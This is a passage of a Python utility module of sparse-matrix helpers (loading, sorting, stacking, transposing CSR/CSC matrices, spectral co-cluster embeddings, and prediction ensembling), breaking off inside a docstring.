def csc_matrix(arg1, shape=None, dtype=None, copy=False):
    """Build a scipy.sparse.csc_matrix from (data, indices, indptr), letting
    indices and indptr keep independent integer dtypes.

    Args:
        arg1 (tuple): (data, indices, indptr) triplet
        shape (tuple, optional): matrix shape; inferred from arg1 when None
        dtype (type, optional): value dtype; inferred from data when None
        copy (bool, optional): copy the input arrays instead of wrapping them

    Returns:
        csc_matrix
    """
    return cs_matrix(arg1, mat_type=smat.csc_matrix, shape=shape, dtype=dtype, copy=copy)
def save_matrix(tgt, mat):
    """Save dense or sparse matrix to file.

    Args:
        tgt (str): path to save the matrix
        mat (numpy.ndarray or scipy.sparse.spmatrix): target matrix to save

    Raises:
        TypeError: if tgt is not a str
        NotImplementedError: if mat is neither ndarray nor spmatrix
    """
    if not isinstance(tgt, str):
        # raise instead of assert: asserts are stripped under `python -O`
        raise TypeError("tgt for save_matrix must be a str, but got {}".format(type(tgt)))
    with open(tgt, "wb") as tgt_file:
        if isinstance(mat, np.ndarray):
            np.save(tgt_file, mat, allow_pickle=False)
        elif isinstance(mat, smat.spmatrix):
            smat.save_npz(tgt_file, mat, compressed=False)
        else:
            raise NotImplementedError("Save not implemented for matrix type {}".format(type(mat)))
def load_matrix(src, dtype=None):
    """Load dense or sparse matrix from file.

    Args:
        src (str): path to load the matrix.
        dtype (numpy.dtype, optional): if given, convert matrix dtype. otherwise use default type.

    Returns:
        mat (numpy.ndarray or scipy.sparse.spmatrix): loaded matrix

    Notes:
        If underlying matrix is {"csc", "csr", "bsr"}, indices will be sorted.
    """
    if not isinstance(src, str):
        raise ValueError("src for load_matrix must be a str")
    # np.load yields an ndarray for .npy files and an NpzFile archive for .npz
    # (the format scipy's save_npz produces)
    mat = np.load(src)
    # decide whether it's dense or sparse
    if isinstance(mat, np.ndarray):
        pass
    elif isinstance(mat, np.lib.npyio.NpzFile):
        # Ref code: https://github.com/scipy/scipy/blob/v1.4.1/scipy/sparse/_matrix_io.py#L19-L80
        matrix_format = mat["format"].item()
        if not isinstance(matrix_format, str):
            # files saved with SciPy < 1.0.0 may contain unicode or bytes.
            matrix_format = matrix_format.decode("ascii")
        try:
            # e.g. "csr" -> scipy.sparse.csr_matrix
            cls = getattr(smat, "{}_matrix".format(matrix_format))
        except AttributeError:
            raise ValueError("Unknown matrix format {}".format(matrix_format))
        if matrix_format in ("csc", "csr", "bsr"):
            mat = cls((mat["data"], mat["indices"], mat["indptr"]), shape=mat["shape"])
            # This is in-place operation
            mat.sort_indices()
        elif matrix_format == "dia":
            mat = cls((mat["data"], mat["offsets"]), shape=mat["shape"])
        elif matrix_format == "coo":
            mat = cls((mat["data"], (mat["row"], mat["col"])), shape=mat["shape"])
        else:
            raise NotImplementedError(
                "Load is not implemented for sparse matrix of format {}.".format(matrix_format)
            )
    else:
        raise TypeError("load_feature_matrix encountered unknown input format {}".format(type(mat)))
    if dtype is None:
        return mat
    else:
        return mat.astype(dtype)
def transpose(mat):
    """Transpose a sparse matrix.

    CSR inputs come back as CSC (and vice versa) by reinterpreting the same
    data/indices/indptr arrays with swapped dimensions; any other sparse
    format falls back to scipy's ``.T``.

    Args:
        mat (scipy.sparse.spmatrix): matrix to transpose.

    Returns:
        the transposed matrix

    Raises:
        ValueError: if mat is not a scipy sparse matrix
    """
    if not isinstance(mat, smat.spmatrix):
        raise ValueError("mat must be a smat.spmatrix type")
    n_rows, n_cols = mat.shape
    if isinstance(mat, smat.csr_matrix):
        return csc_matrix((mat.data, mat.indices, mat.indptr), shape=(n_cols, n_rows))
    if isinstance(mat, smat.csc_matrix):
        return csr_matrix((mat.data, mat.indices, mat.indptr), shape=(n_cols, n_rows))
    return mat.T
def sorted_csr_from_coo(shape, row_idx, col_idx, val, only_topk=None):
    """Return a row-sorted CSR matrix from a COO sparse matrix.
    Nonzero elements in each row of the returned CSR matrix is sorted in an descending order based on the value. If only_topk is given, only topk largest elements will be kept.
    Args:
        shape (tuple): the shape of the input COO matrix
        row_idx (ndarray): row indices of the input COO matrix
        col_idx (ndarray): col indices of the input COO matrix
        val (ndarray): values of the input COO matrix
        only_topk (int, optional): keep only topk elements per row. Default None to ignore
    Returns:
        csr_matrix
    """
    csr = smat.csr_matrix((val, (row_idx, col_idx)), shape=shape)
    csr.sort_indices()
    # Reorder each row's entries by descending value; mergesort is stable so
    # ties keep their (column-sorted) relative order.
    for i in range(shape[0]):
        rng = slice(csr.indptr[i], csr.indptr[i + 1])
        sorted_idx = np.argsort(-csr.data[rng], kind="mergesort")
        csr.indices[rng] = csr.indices[rng][sorted_idx]
        csr.data[rng] = csr.data[rng][sorted_idx]
    if only_topk is not None:
        assert isinstance(only_topk, int), f"Wrong type: type(only_topk) = {type(only_topk)}"
        # NOTE(review): max(min(1, k), k) always equals k, so this "clamp" is a
        # no-op; presumably max(1, only_topk) was intended -- confirm.
        only_topk = max(min(1, only_topk), only_topk)
        nnz_of_insts = csr.indptr[1:] - csr.indptr[:-1]
        # position of each nonzero within its row; keep only the first only_topk
        # entries of every row (rows are already value-sorted descending)
        row_idx = np.repeat(np.arange(shape[0], dtype=csr.indices.dtype), nnz_of_insts)
        selected_idx = (np.arange(len(csr.data)) - csr.indptr[row_idx]) < only_topk
        row_idx = row_idx[selected_idx]
        col_idx = csr.indices[selected_idx]
        val = csr.data[selected_idx]
        indptr = np.cumsum(np.bincount(row_idx + 1, minlength=(shape[0] + 1)))
        csr = csr_matrix((val, col_idx, indptr), shape=shape, dtype=val.dtype)
    return csr
def sorted_csc_from_coo(shape, row_idx, col_idx, val, only_topk=None):
    """Return a column-sorted CSC matrix from a COO sparse matrix.

    Nonzero elements in each col of the returned CSC matrix are sorted in a
    descending order based on the value. If only_topk is given, only the topk
    largest elements per column will be kept.

    Args:
        shape (tuple): the shape of the input COO matrix
        row_idx (ndarray): row indices of the input COO matrix
        col_idx (ndarray): col indices of the input COO matrix
        val (ndarray): values of the input COO matrix
        only_topk (int, optional): keep only topk elements per col. Default None to ignore

    Returns:
        csc_matrix
    """
    # Rows of the transposed CSR are the columns of the final CSC, so applying
    # topk per row here yields topk per column after transposing.
    # Fix: only_topk was hard-coded to None, silently ignoring the argument.
    csr = sorted_csr_from_coo(shape[::-1], col_idx, row_idx, val, only_topk=only_topk)
    return transpose(csr)
def binarized(X, inplace=False):
    """Binarize a dense/sparse matrix. All nonzero elements become 1.

    Args:
        X (np.ndarray, spmatrix): input matrix to binarize
        inplace (bool, optional): if True do the binarization in-place, else return a copy. Default False

    Returns:
        binarized X

    Raises:
        NotImplementedError: if X is neither ndarray nor spmatrix
    """
    if not isinstance(X, (np.ndarray, smat.spmatrix)):
        raise NotImplementedError(
            "this function only support X being np.ndarray or scipy.sparse.spmatrix."
        )
    if not inplace:
        X = X.copy()
    if isinstance(X, smat.spmatrix):
        # only stored (nonzero) entries are touched
        X.data[:] = 1
    else:
        # Fix: only overwrite nonzero entries; the previous `X[:] = 1` also
        # turned zeros into 1, contradicting the documented contract.
        X[X != 0] = 1
    return X
def sorted_csr(csr, only_topk=None):
    """Return a copy of `csr` whose nonzeros in each row are sorted in
    descending order by value.

    If `only_topk` is given, only the top-k largest elements per row are kept.

    Args:
        csr (csr_matrix): input csr_matrix to sort
        only_topk (int, optional): keep only topk elements per row. Default None to ignore

    Returns:
        csr_matrix
    """
    if not isinstance(csr, smat.csr_matrix):
        raise ValueError("the input matrix must be a csr_matrix.")
    # Expand the implicit row id of every stored element, then rebuild the
    # matrix through the COO-based sorting helper.
    nnz_per_row = csr.indptr[1:] - csr.indptr[:-1]
    rows = np.repeat(np.arange(csr.shape[0], dtype=np.uint32), nnz_per_row)
    return sorted_csr_from_coo(csr.shape, rows, csr.indices, csr.data, only_topk)
def sorted_csc(csc, only_topk=None):
    """Return a copy of `csc` whose nonzeros in each column are sorted in
    descending order by value.

    If `only_topk` is given, only the top-k largest elements per column are kept.

    Args:
        csc (csc_matrix): input csc_matrix to sort
        only_topk (int, optional): keep only topk elements per col. Default None to ignore

    Returns:
        csc_matrix
    """
    if not isinstance(csc, smat.csc_matrix):
        raise ValueError("the input matrix must be a csc_matrix.")
    # Sorting columns of a CSC is sorting rows of its transpose.
    # Bug fix: `only_topk` was previously not forwarded to sorted_csr, so the
    # documented per-column truncation never happened.
    return transpose(sorted_csr(transpose(csc), only_topk=only_topk))
def dense_to_csr(dense, topk=None, batch=None):
    """Memory efficient method to construct a csr_matrix from a dense matrix.

    Args:
        dense (ndarray): 2-D dense matrix to convert.
        topk (int or None, optional): keep topk non-zeros with largest abs value for each row.
            Default None to keep everything.
        batch (int or None, optional): the batch size for construction.
            Default None to use min(dense.shape[0], 10 ** 5).

    Returns:
        csr_matrix that has topk nnz each row with the same shape as dense.
    """
    BATCH_LIMIT = 10 ** 5
    if topk is None:
        keep_topk = dense.shape[1]
    else:
        keep_topk = min(dense.shape[1], max(1, int(topk)))
    # if batch is given, use input batch size even if input batch > BATCH_LIMIT
    if batch is None:
        chunk_size = min(dense.shape[0], BATCH_LIMIT)
    else:
        chunk_size = min(dense.shape[0], max(1, int(batch)))
    max_nnz = keep_topk * dense.shape[0]
    # choose 32-bit index arrays whenever they cannot overflow
    indptr_dtype = np.int32 if max_nnz < np.iinfo(np.int32).max else np.int64
    indices_dtype = np.int32 if dense.shape[1] < np.iinfo(np.int32).max else np.int64
    data = np.empty((keep_topk * dense.shape[0],), dtype=dense.dtype)
    indices = np.empty((keep_topk * dense.shape[0],), dtype=indices_dtype)
    for i in range(0, dense.shape[0], chunk_size):
        cur_chunk = dense[i : i + chunk_size, :]
        chunk_len = cur_chunk.shape[0]
        if keep_topk < dense.shape[1]:
            # Bug fix: partition with kth=-keep_topk so the *last* keep_topk
            # positions are guaranteed to be the top-k by absolute value.
            # The previous kth=keep_topk only guaranteed that when keep_topk
            # happened to equal shape[1] - keep_topk.
            col_indices = np.argpartition(abs(cur_chunk), -keep_topk, axis=1)[:, -keep_topk:]
        else:
            # keeping every column: indices are simply 0..keep_topk-1 per row
            col_indices = np.repeat(np.arange(keep_topk)[np.newaxis, :], chunk_len, axis=0)
        row_indices = np.repeat(np.arange(chunk_len)[:, np.newaxis], keep_topk, axis=1)
        chunk_data = cur_chunk[row_indices, col_indices]
        data[i * keep_topk : i * keep_topk + chunk_data.size] = chunk_data.flatten()
        indices[i * keep_topk : i * keep_topk + col_indices.size] = col_indices.flatten()
    # every row holds exactly keep_topk stored entries
    indptr = np.arange(0, dense.shape[0] * keep_topk + 1, keep_topk, dtype=indptr_dtype)
    # Bypass scipy constructor to allow different indices and indptr types
    return csr_matrix((data, indices, indptr), shape=dense.shape)
def vstack_csr(matrices, dtype=None):
    """Memory efficient method to stack csr_matrices vertically.

    The returned matrix retains the indices order of the inputs.

    Args:
        matrices (list or tuple of csr_matrix): the matrices to stack in order, with shape (M1 x N), (M2 x N), ...
        dtype (dtype, optional): The data-type of the output matrix. Default None to infer from matrices

    Returns:
        csr_matrix with shape (M1 + M2 + ..., N)
    """
    if not isinstance(matrices, (list, tuple)):
        raise ValueError("matrices should be either list or tuple")
    if any(not isinstance(X, smat.csr_matrix) for X in matrices):
        raise ValueError("all matrix in matrices need to be csr_matrix!")
    if len(matrices) <= 1:
        return matrices[0] if len(matrices) == 1 else None
    nr_cols = matrices[0].shape[1]
    if any(mat.shape[1] != nr_cols for mat in matrices):
        raise ValueError("Second dim not match")
    total_nnz = sum(int(mat.nnz) for mat in matrices)
    total_rows = sum(int(mat.shape[0]) for mat in matrices)
    # infer result dtypes from inputs
    int32max = np.iinfo(np.int32).max
    if dtype is None:
        # Fix: scipy.sparse.sputils is a private module that was removed in
        # SciPy 1.8; np.result_type applies the equivalent promotion rules.
        dtype = np.result_type(*[mat.dtype for mat in matrices])
    indices_dtype = np.int64 if nr_cols > int32max else np.int32
    indptr_dtype = np.int64 if total_nnz > int32max else np.int32
    indptr = np.empty(total_rows + 1, dtype=indptr_dtype)
    indices = np.empty(total_nnz, dtype=indices_dtype)
    data = np.empty(total_nnz, dtype=dtype)
    indptr[0], cur_nnz, cur_row = 0, 0, 0
    for mat in matrices:
        indices[cur_nnz : cur_nnz + mat.nnz] = mat.indices
        data[cur_nnz : cur_nnz + mat.nnz] = mat.data
        # can not merge the following two lines because
        # mat.indptr[1:] + cur_nnz may overflow!
        indptr[cur_row + 1 : cur_row + mat.shape[0] + 1] = mat.indptr[1:]
        indptr[cur_row + 1 : cur_row + mat.shape[0] + 1] += cur_nnz
        cur_nnz += mat.nnz
        cur_row += mat.shape[0]
    return csr_matrix((data, indices, indptr), shape=(total_rows, nr_cols))
def hstack_csr(matrices, dtype=None):
    """Memory efficient method to stack csr_matrices horizontally.

    The returned matrix retains the indices order of the inputs.

    Args:
        matrices (list or tuple of csr_matrix): the matrices to stack in order, with shape (M x N1), (M x N2), ...
        dtype (dtype, optional): The data-type of the output matrix. Default None to infer from matrices

    Returns:
        csr_matrix with shape (M, N1 + N2 + ...)
    """
    if not isinstance(matrices, (list, tuple)):
        raise ValueError("matrices should be either list or tuple")
    if any(not isinstance(X, smat.csr_matrix) for X in matrices):
        raise ValueError("all matrix in matrices need to be csr_matrix!")
    if len(matrices) <= 1:
        return matrices[0] if len(matrices) == 1 else None
    nr_rows = matrices[0].shape[0]
    if any(mat.shape[0] != nr_rows for mat in matrices):
        raise ValueError("First dim not match")
    total_nnz = sum(int(mat.nnz) for mat in matrices)
    total_cols = sum(int(mat.shape[1]) for mat in matrices)
    # infer result dtypes from inputs
    int32max = np.iinfo(np.int32).max
    if dtype is None:
        # Fix: scipy.sparse.sputils is a private module that was removed in
        # SciPy 1.8; np.result_type applies the equivalent promotion rules.
        dtype = np.result_type(*[mat.dtype for mat in matrices])
    # Bug fix: indices hold *column* ids of the stacked matrix (values up to
    # total_cols - 1); the dtype was previously chosen from nr_rows.
    indices_dtype = np.int64 if total_cols > int32max else np.int32
    indptr_dtype = np.int64 if total_nnz > int32max else np.int32
    indptr = np.empty(nr_rows + 1, dtype=indptr_dtype)
    indices = np.empty(total_nnz, dtype=indices_dtype)
    data = np.empty(total_nnz, dtype=dtype)
    indptr[0], cur_ptr = 0, 0
    for i in range(nr_rows):  # for every row
        start_col = 0
        for mat in matrices:
            cur_nnz = mat.indptr[i + 1] - mat.indptr[i]
            # assign first, then shift in the output dtype, so the addition
            # cannot overflow the (possibly int32) per-matrix index arrays
            indices[cur_ptr : cur_ptr + cur_nnz] = mat.indices[mat.indptr[i] : mat.indptr[i + 1]]
            indices[cur_ptr : cur_ptr + cur_nnz] += start_col
            data[cur_ptr : cur_ptr + cur_nnz] = mat.data[mat.indptr[i] : mat.indptr[i + 1]]
            cur_ptr += cur_nnz
            start_col += mat.shape[1]
        indptr[i + 1] = cur_ptr
    return csr_matrix((data, indices, indptr), shape=(nr_rows, total_cols))
def block_diag_csr(matrices, dtype=None):
    """Memory efficient method to stack csr_matrices block diagonally.

    The returned matrix retains the indices order of the inputs.

    Args:
        matrices (list or tuple of csr_matrix): the matrices to stack in order, with shape (NR1 x NC1), (NR2 x NC2), ...
        dtype (dtype, optional): The data-type of the output matrix. Default None to infer from matrices

    Returns:
        csr_matrix with shape (NR1 + NR2 + ..., NC1 + NC2 + ...)
    """
    if not isinstance(matrices, (list, tuple)):
        raise ValueError("matrices should be either list or tuple")
    if any(not isinstance(X, smat.csr_matrix) for X in matrices):
        raise ValueError("all matrix in matrices need to be csr_matrix!")
    if len(matrices) <= 1:
        return matrices[0] if len(matrices) == 1 else None
    total_nnz = sum(int(mat.nnz) for mat in matrices)
    total_rows = sum(int(mat.shape[0]) for mat in matrices)
    total_cols = sum(int(mat.shape[1]) for mat in matrices)
    # infer result dtypes from inputs
    int32max = np.iinfo(np.int32).max
    if dtype is None:
        # Fix: scipy.sparse.sputils is a private module that was removed in
        # SciPy 1.8; np.result_type applies the equivalent promotion rules.
        dtype = np.result_type(*[mat.dtype for mat in matrices])
    # Bug fix: indices hold *column* ids (values up to total_cols - 1); the
    # dtype was previously chosen from total_rows.
    indices_dtype = np.int64 if total_cols > int32max else np.int32
    indptr_dtype = np.int64 if total_nnz > int32max else np.int32
    indptr = np.empty(total_rows + 1, dtype=indptr_dtype)
    indices = np.empty(total_nnz, dtype=indices_dtype)
    data = np.empty(total_nnz, dtype=dtype)
    cur_row, cur_col, cur_nnz = 0, 0, 0
    indptr[0] = 0
    for mat in matrices:
        data[cur_nnz : cur_nnz + mat.nnz] = mat.data
        # assign first, then shift in the output dtype, so the additions
        # cannot overflow the (possibly int32) per-matrix indices/indptr
        # arrays (same precaution vstack_csr already takes)
        indices[cur_nnz : cur_nnz + mat.nnz] = mat.indices
        indices[cur_nnz : cur_nnz + mat.nnz] += cur_col
        indptr[1 + cur_row : 1 + cur_row + mat.shape[0]] = mat.indptr[1:]
        indptr[1 + cur_row : 1 + cur_row + mat.shape[0]] += indptr[cur_row]
        cur_col += mat.shape[1]
        cur_row += mat.shape[0]
        cur_nnz += mat.nnz
    return csr_matrix((data, indices, indptr), shape=(total_rows, total_cols))
def vstack_csc(matrices, dtype=None):
    """Memory efficient method to stack csc_matrices vertically.

    The returned matrix retains the indices order of the inputs.

    Args:
        matrices (list or tuple of csc_matrix): the matrices to stack in order, with shape (M1 x N), (M2 x N), ...
        dtype (dtype, optional): The data-type of the output matrix. Default None to infer from matrices

    Returns:
        csc_matrix with shape (M1 + M2 + ..., N)
    """
    if not isinstance(matrices, (list, tuple)):
        raise ValueError("matrices should be either list or tuple")
    if any(not isinstance(X, smat.csc_matrix) for X in matrices):
        raise ValueError("all matrix in matrices need to be csc_matrix!")
    if len(matrices) <= 1:
        return matrices[0] if len(matrices) == 1 else None
    # Vertically stacking CSC == horizontally stacking the transposed CSRs,
    # then transposing the result back.
    transposed = [transpose(mat) for mat in matrices]
    return transpose(hstack_csr(transposed, dtype=dtype))
def hstack_csc(matrices, dtype=None):
    """Memory efficient method to stack csc_matrices horizontally.

    The returned matrix retains the indices order of the inputs.

    Args:
        matrices (list or tuple of csc_matrix): the matrices to stack in order, with shape (M x N1), (M x N2), ...
        dtype (dtype, optional): The data-type of the output matrix. Default None to infer from matrices

    Returns:
        csc_matrix with shape (M, N1 + N2 + ...)
    """
    if not isinstance(matrices, (list, tuple)):
        raise ValueError("matrices should be either list or tuple")
    if any(not isinstance(X, smat.csc_matrix) for X in matrices):
        raise ValueError("all matrix in matrices need to be csc_matrix!")
    if len(matrices) <= 1:
        return matrices[0] if len(matrices) == 1 else None
    # Horizontally stacking CSC == vertically stacking the transposed CSRs,
    # then transposing the result back.
    transposed = [transpose(mat) for mat in matrices]
    return transpose(vstack_csr(transposed, dtype=dtype))
def block_diag_csc(matrices, dtype=None):
    """Memory efficient method to stack csc_matrices block diagonally.

    The returned matrix retains the indices order of the inputs.

    Args:
        matrices (list or tuple of csc_matrix): the matrices to stack in order, with shape (NR1 x NC1), (NR2 x NC2), ...
        dtype (dtype, optional): The data-type of the output matrix. Default None to infer from matrices

    Returns:
        csc_matrix with shape (NR1 + NR2 + ..., NC1 + NC2 + ...)
    """
    if not isinstance(matrices, (list, tuple)):
        raise ValueError("matrices should be either list or tuple")
    if any(not isinstance(X, smat.csc_matrix) for X in matrices):
        raise ValueError("all matrix in matrices need to be csc_matrix!")
    if len(matrices) <= 1:
        return matrices[0] if len(matrices) == 1 else None
    # The block-diagonal of the transposes, transposed back, equals the
    # block-diagonal of the originals.
    transposed = [transpose(mat) for mat in matrices]
    return transpose(block_diag_csr(transposed, dtype=dtype))
def get_csc_col_nonzero(matrix):
    """Given a CSC matrix, return the nonzero row ids of each column.

    The returned arrays retain the indices order.

    Args:
        matrix: the csc_matrix to operate on, with shape (N x M)

    Returns:
        list of ndarray [a_1, a_2, ...], where a_i holds the nonzero row ids of col i
    """
    if not isinstance(matrix, smat.csc_matrix):
        raise ValueError("matrix need to be csc_matrix!")
    per_col = []
    for col in range(matrix.shape[1]):
        # indptr delimits the slice of stored row ids belonging to this column
        start, end = matrix.indptr[col], matrix.indptr[col + 1]
        per_col.append(matrix.indices[start:end])
    return per_col
def get_csr_row_nonzero(matrix):
    """Given a CSR matrix, return the nonzero col ids of each row.

    The returned arrays retain the indices order.

    Args:
        matrix: the csr_matrix to operate on, with shape (N x M)

    Returns:
        list of ndarray [a_1, a_2, ...], where a_i holds the nonzero col ids of row i
    """
    if not isinstance(matrix, smat.csr_matrix):
        raise ValueError("matrix need to be csr_matrix!")
    per_row = []
    for row in range(matrix.shape[0]):
        # indptr delimits the slice of stored col ids belonging to this row
        start, end = matrix.indptr[row], matrix.indptr[row + 1]
        per_row.append(matrix.indices[start:end])
    return per_row
def get_row_submatrices(matrices, row_indices):
    """Select the rows given in `row_indices` from each of the given matrices.

    Args:
        matrices (list of csr_matrix or ndarray): the matrices [mat_1, mat_2, ...] to operate on, with shape (M x N1), (M x N2), ...
        row_indices (list or ndarray): the row indices to select

    Returns:
        list of csr_matrix or ndarray, one sub-matrix per input matrix
    """
    if not isinstance(matrices, (list, tuple)):
        raise ValueError("matrices should be either list or tuple")
    n_mat = len(matrices)
    if n_mat == 0:
        raise ValueError("At least one matrix required as input")
    if any(not isinstance(X, (smat.csr_matrix, np.ndarray)) for X in matrices):
        raise ValueError("all matrix in matrices need to be csr_matrix or ndarray!")
    nr_rows = matrices[0].shape[0]
    if any(mat.shape[0] != nr_rows for mat in matrices):
        raise ValueError("First dim not match")
    if any(idx >= nr_rows or idx < 0 for idx in row_indices):
        raise ValueError("row indices should be positive and do not exceed matrix first dimension")
    selected = []
    for mat in matrices:
        sub = mat[row_indices, :]
        if isinstance(mat, smat.csr_matrix):
            # fancy row indexing can leave per-row indices unsorted;
            # restore the canonical CSR ordering
            sub.sort_indices()
        selected.append(sub)
    return selected
def dense_to_coo(dense):
    """Convert a dense matrix to COO format (every entry is stored explicitly).

    Args:
        dense (ndarray): input dense matrix

    Returns:
        coo_matrix
    """
    n_rows, n_cols = dense.shape
    # every (row, col) pair is stored: repeat each row id n_cols times and
    # tile the col ids n_rows times, matching dense.ravel()'s C order
    row_ids = np.repeat(np.arange(n_rows, dtype=np.uint32), n_cols).astype(np.uint32)
    col_ids = np.tile(np.arange(n_cols, dtype=np.uint32), n_rows)
    return smat.coo_matrix((dense.ravel(), (row_ids, col_ids)), shape=dense.shape)
def get_relevance_csr(csr, mm=None, dtype=np.float64):
    """Build a CSR matrix of relevance scores from a sorted prediction matrix.

    The relevance of the r-th ranked element of a row (r starting at 1) is
    ``mm - r + 1``, so the top ranked element of each row scores mm.

    Args:
        csr (csr_matrix): input CSR matrix, row indices are sorted in descending order
        mm (int, optional): max rank, inferred from csr if not given
        dtype (type, optional): datatype for the returned relevance matrix. Default float64.

    Returns:
        csr_matrix of relevance scores
    """
    nnz_per_row = csr.indptr[1:] - csr.indptr[:-1]
    if mm is None:
        mm = nnz_per_row.max()
    # row id of every stored element, expanded from the indptr structure
    row_of_nnz = np.repeat(np.arange(csr.shape[0]), nnz_per_row)
    # 0-based position of each stored element within its own row
    local_rank = np.arange(len(csr.data)) - csr.indptr[row_of_nnz]
    rel = np.array(mm - local_rank, dtype=dtype)
    return smat.csr_matrix((rel, csr.indices, csr.indptr), csr.shape)
def get_sparsified_coo(coo, selected_rows, selected_columns):
    """Zero out every entry that is not in the selected rows and columns.

    Args:
        coo (coo_matrix): input coo matrix
        selected_rows (list of int or np.array(int)): rows to keep
        selected_columns (list of int or np.array(int)): columns to keep

    Returns:
        coo_matrix with entries outside the selected rows/columns removed
    """
    keep_row = np.zeros(coo.shape[0], dtype=bool)
    keep_col = np.zeros(coo.shape[1], dtype=bool)
    keep_row[selected_rows] = True
    keep_col[selected_columns] = True
    # an entry survives only when both its row AND its column are selected
    mask = keep_row[coo.row] & keep_col[coo.col]
    return smat.coo_matrix(
        (coo.data[mask], (coo.row[mask], coo.col[mask])), shape=coo.shape
    )
def csr_rowwise_mul(A, v):
    """Row-wise multiplication between sparse csr matrix A and dense array v.

    Each row i of A is multiplied by v[i]; len(v) must equal A.shape[0].

    Args:
        A (csr_matrix): The matrix to be multiplied.
        v (ndarray): The multiplying vector.

    Returns:
        Z (csr_matrix): The product of row-wise multiplication of A and v.
    """
    if not isinstance(A, smat.csr_matrix):
        raise ValueError("A must be scipy.sparse.csr_matrix")
    if not isinstance(v, np.ndarray):
        raise ValueError("v must be a numpy ndarray")
    if v.ndim != 1:
        raise ValueError("v should be an 1-d array")
    if v.shape[0] != A.shape[0]:
        raise ValueError("The dimension of v should be the same as the number of rows of A")
    Z = A.copy()
    # Vectorized (replaces a Python-level loop over rows): row i owns
    # indptr[i+1]-indptr[i] consecutive entries of Z.data, so expand v by the
    # per-row nnz counts and scale all stored values in one pass.
    Z.data *= np.repeat(v, np.diff(Z.indptr))
    return Z
def csc_colwise_mul(A, v):
    """Column-wise multiplication between sparse csc matrix A and dense array v.

    Each column j of A is multiplied by v[j]; len(v) must equal A.shape[1].

    Args:
        A (csc_matrix): The matrix to be multiplied.
        v (ndarray): The multiplying vector.

    Returns:
        Z (csc_matrix): The product of column-wise multiplication of A and v.
    """
    if not isinstance(A, smat.csc_matrix):
        raise ValueError("A must be scipy.sparse.csc_matrix")
    if not isinstance(v, np.ndarray):
        raise ValueError("v must be a numpy ndarray")
    if v.ndim != 1:
        raise ValueError("v should be an 1-d array")
    if v.shape[0] != A.shape[1]:
        raise ValueError("The dimension of v should be the same as the number of columns of A")
    Z = A.copy()
    # Vectorized (replaces a Python-level loop over columns): in CSC, column
    # j owns indptr[j+1]-indptr[j] consecutive entries of Z.data, so expand v
    # by the per-column nnz counts and scale all stored values in one pass.
    Z.data *= np.repeat(v, np.diff(Z.indptr))
    return Z
def get_cocluster_spectral_embeddings(A, dim=24):
    """Obtain the co-cluster spectral embeddings for the given bipartite graph described in [1]

    * [1] `Dhillon, 2001. Co-clustering documents and words using
           bipartite spectral graph partition`

    Args:
        A (csr_matrix or csc_matrix): bipartite graph matrix
        dim (int, optional): the dimension of the returned embeddings. Default 24

    Returns:
        (row_embedding, col_embedding): a tuple of embeddings for rows and columns respectively
            row_embedding: numpy.ndarray of shape (A.shape[0], dim).
            col_embedding: numpy.ndarray of shape (A.shape[1], dim).
    """
    assert A.min() >= 0.0, "A must be nonnegative"

    # local import keeps sklearn an optional dependency of the module
    from sklearn.utils.extmath import randomized_svd

    # Obtain An, the normalized adjacency bipartite matrix described in Eq (10) of [1]
    # A_n = D_1^{-1/2} A D_2^{-1/2}
    # row_diag = diagonal of D_1^{-1/2}
    # col_diag = diagonal of D_2^{-1/2}
    row_diag = np.asarray(np.sqrt(A.sum(axis=1))).squeeze()
    col_diag = np.asarray(np.sqrt(A.sum(axis=0))).squeeze()
    # empty rows/cols would yield a divide-by-zero; leave their scale at 1
    row_diag[row_diag == 0] = 1.0
    col_diag[col_diag == 0] = 1.0
    row_diag = 1.0 / row_diag
    col_diag = 1.0 / col_diag
    if smat.issparse(A):
        # scale rows/cols via diagonal matrix products to stay sparse
        n_rows, n_cols = A.shape
        r = smat.dia_matrix((row_diag, [0]), shape=(n_rows, n_rows))
        c = smat.dia_matrix((col_diag, [0]), shape=(n_cols, n_cols))
        An = r * A * c
    else:
        # dense case: broadcasting achieves the same scaling
        An = row_diag[:, np.newaxis] * A * col_diag

    # run SVD on An; fixed random_state keeps the embeddings deterministic
    nr_discards = 1 # discarding the first component
    U, Sigma, VT = randomized_svd(An, dim + nr_discards, random_state=0)
    # Normalized the singular vectors based on Eq (24) of [1]
    row_embedding = np.ascontiguousarray(row_diag[:, np.newaxis] * U[:, nr_discards:])
    col_embedding = np.ascontiguousarray(col_diag[:, np.newaxis] * VT[nr_discards:].T)
    return row_embedding, col_embedding
class CsrEnsembler(object):
    """A collection of ensembling strategies for lists of sorted CSR predictions."""

    @staticmethod
    def check_validlity(*args):
        """Assert that all inputs are csr_matrix instances with identical shape.

        Args:
            args (iterable over csr_matrix): input CSR matrices
        """
        for mat in args:
            assert isinstance(mat, smat.csr_matrix), type(mat)
        assert all(mat.shape == args[0].shape for mat in args)

    @staticmethod
    def average(*args):
        """Ensemble predictions by averaging prediction values.

        Args:
            args (iterable over csr_matrix): input CSR matrices

        Returns:
            ret (csr_matrix): ensembled prediction CSR matrix
        """
        CsrEnsembler.check_validlity(*args)
        combined = sorted_csr(sum(args))
        combined.data /= len(args)
        return combined

    @staticmethod
    def rank_average(*args):
        """Ensemble predictions by averaging prediction ranks.

        Args:
            args (iterable over csr_matrix): input CSR matrices

        Returns:
            ret (csr_matrix): ensembled prediction CSR matrix
        """
        CsrEnsembler.check_validlity(*args)
        # global max rank, so relevance scores are comparable across inputs
        max_rank = max((mat.indptr[1:] - mat.indptr[:-1]).max() for mat in args)
        combined = sum(get_relevance_csr(mat, max_rank) for mat in args)
        combined = sorted_csr(combined)
        combined.data /= len(args)
        return combined

    @staticmethod
    def round_robin(*args):
        """Ensemble predictions by round robin.

        Args:
            args (iterable over csr_matrix): input CSR matrices

        Returns:
            ret (csr_matrix): ensembled prediction CSR matrix
        """
        CsrEnsembler.check_validlity(*args)
        # earlier inputs get a larger fractional tie-breaking bonus
        base = 1.0 / (len(args) + 1.0)
        max_rank = max((mat.indptr[1:] - mat.indptr[:-1]).max() for mat in args)
        combined = get_relevance_csr(args[0], max_rank)
        combined.data[:] += len(args) * base
        for pos, mat in enumerate(args[1:], 1):
            cur = get_relevance_csr(mat, max_rank)
            cur.data[:] += (len(args) - pos) * base
            combined = combined.maximum(cur)
        combined = sorted_csr(combined)
        combined.data /= len(args)
        return combined

    @staticmethod
    def print_ens(Ytrue, pred_set, param_set, topk=10):
        """Print metrics for every individual prediction and every ensembler.

        Args:
            Ytrue (csr_matrix): ground truth label matrix
            pred_set (iterable over csr_matrix): prediction matrices to ensemble
            param_set (iterable): parameters or model names associated with pred_set
